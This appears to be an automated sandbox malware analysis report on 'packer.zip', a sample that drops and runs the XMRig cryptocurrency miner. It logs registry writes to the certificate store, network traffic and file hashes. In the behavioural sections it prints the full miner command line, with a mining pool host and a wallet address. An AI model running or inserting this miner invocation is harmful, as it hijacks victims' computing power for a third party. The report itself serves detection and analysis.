Malware Analysis Report

2025-04-19 16:07

Sample ID 240522-sk9f8sfe65
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

xmrig

XMRig Miner payload

Executes dropped EXE

Unsigned PE

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 15:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4164-16-0x000001CE9FD50000-0x000001CE9FD70000-memory.dmp

memory/4164-17-0x000001CE9FDA0000-0x000001CE9FDC0000-memory.dmp

memory/4164-18-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-20-0x000001CE9FDE0000-0x000001CE9FE00000-memory.dmp

memory/4164-19-0x000001CE9FDC0000-0x000001CE9FDE0000-memory.dmp

memory/4164-21-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-22-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-25-0x000001CE9FDE0000-0x000001CE9FE00000-memory.dmp

memory/4164-24-0x000001CE9FDC0000-0x000001CE9FDE0000-memory.dmp

memory/4164-23-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-26-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-27-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-28-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-29-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-30-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-31-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-32-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-33-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-34-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-35-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-36-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-37-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-38-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-39-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-40-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-41-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-42-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-43-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-44-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-45-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-46-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-47-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-48-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-49-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-50-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-51-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-52-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-53-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-54-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-55-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-56-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-57-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-58-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-59-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-60-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-61-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-62-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-63-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-64-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-65-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-66-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-67-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-68-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-69-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-70-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-71-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-72-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-73-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-74-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-75-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-76-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-77-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-78-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-79-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-80-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-81-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-82-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-83-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

memory/4164-84-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2928-16-0x000002118EC10000-0x000002118EC30000-memory.dmp

memory/2928-17-0x000002118EEA0000-0x000002118EEC0000-memory.dmp

memory/2928-18-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-20-0x0000021190680000-0x00000211906A0000-memory.dmp

memory/2928-19-0x00000211906A0000-0x00000211906C0000-memory.dmp

memory/2928-21-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-22-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-23-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-24-0x00000211906A0000-0x00000211906C0000-memory.dmp

memory/2928-25-0x0000021190680000-0x00000211906A0000-memory.dmp

memory/2928-26-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-27-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-28-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-29-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-30-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-31-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-32-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-33-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-34-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-35-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-36-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-37-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-38-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-39-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-40-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-41-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-42-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-43-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-44-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-45-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-46-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-47-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-48-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-49-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-50-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-51-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-52-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-53-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-54-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-55-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-56-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-57-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-58-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-59-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-60-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-61-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

